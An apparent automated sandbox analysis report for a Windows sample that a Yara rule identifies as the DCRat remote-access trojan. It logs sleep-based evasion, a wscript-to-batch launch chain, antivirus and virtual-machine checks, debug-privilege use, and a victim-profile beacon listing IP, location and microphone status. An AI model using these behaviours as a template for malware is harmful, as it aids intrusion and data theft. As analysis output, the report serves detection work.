Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598403
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598283
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597993
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597875
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597765
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597656
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597545
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597437
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597328
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597219
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597109
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596890
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596781
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596672
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596562
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596453
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596344
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596234
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596125
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596016
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 595891

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Window / User API: threadDelayed 1193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Window / User API: threadDelayed 879	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Window / User API: threadDelayed 367
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Window / User API: threadDelayed 364
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Window / User API: threadDelayed 359
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Window / User API: threadDelayed 2980
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Window / User API: threadDelayed 6787

Source: C:\Users\user\Desktop\LaRHzSijsq.exe TID: 7340	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe TID: 7680	Thread sleep count: 1193 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe TID: 7680	Thread sleep count: 879 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe TID: 7656	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe TID: 5664	Thread sleep count: 367 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe TID: 7192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe TID: 792	Thread sleep count: 364 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe TID: 5848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7296	Thread sleep count: 359 > 30
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7756	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -3600000s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599875s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599766s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599656s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599547s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599437s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599328s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599218s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -599109s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598999s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598890s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598781s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598672s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598510s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598403s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -598283s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597993s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597875s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597765s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597656s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597545s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597437s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597328s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597219s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597109s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -597000s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596890s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596781s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596672s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596562s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596453s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596344s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596234s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596125s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -596016s >= -30000s
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe TID: 7744	Thread sleep time: -595891s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		2_2_007DA5F4
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		2_2_007EB8E0

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007EDD72 VirtualQuery,GetSystemInfo,

2_2_007EDD72

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 30000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599875
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599766
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599656
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599547
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599437
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599328
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599218
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 599109
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598999
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598890
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598781
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598672
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598510
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598403
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 598283
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597993
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597875
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597765
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597656
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597545
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597437
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597328
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597219
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597109
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 597000
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596890
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596781
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596672
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596562
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596453
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596344
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596234
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596125
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 596016
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Thread delayed: delay time: 595891

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: wscript.exe, 00000003.00000002.1842503268.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\t
Source: w32tm.exe, 0000002C.00000002.1926633988.0000029C9EF48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: ry0bqfj0.vyo.exe, 00000002.00000003.1745487726.0000000003382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: WinLatency.exe, 00000006.00000002.1883173650.000000001C14A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42efL7
Source: LaRHzSijsq.exe, 00000000.00000002.1743430185.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4150597390.000000001BBAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WinLatency.exe, 00000006.00000002.1882171069.000000001BF76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\.
Source: wscript.exe, 00000003.00000002.1842503268.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:J
Source: LaRHzSijsq.exe, 00000000.00000002.1741726881.0000000001000000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: LaRHzSijsq.exe, 00000000.00000002.1743430185.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+r

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

API call chain: ExitProcess graph end node

graph_2-24352

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_007F866F

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007F753D mov eax, dword ptr fs:[00000030h]

2_2_007F753D

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007FB710 GetProcessHeap,

2_2_007FB710

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Process token adjusted: Debug
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process token adjusted: Debug
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EF063 SetUnhandledExceptionFilter,	2_2_007EF063
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_007EF22B
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_007F866F
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_007EEF05

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process created: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe "C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat"	Jump to behavior
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process created: unknown unknown
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"123716","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7503,-74.0014","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"123716","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7503,-74.0014","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;k

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007EED5B cpuid

2_2_007EED5B

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

2_2_007EA63C

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Queries volume information: C:\Users\user\Desktop\LaRHzSijsq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe VolumeInformation
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Queries volume information: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe VolumeInformation
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Queries volume information: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007ED5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

2_2_007ED5D4

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007DACF5 GetVersionExW,

2_2_007DACF5

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000006.00000002.1880642049.0000000012F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
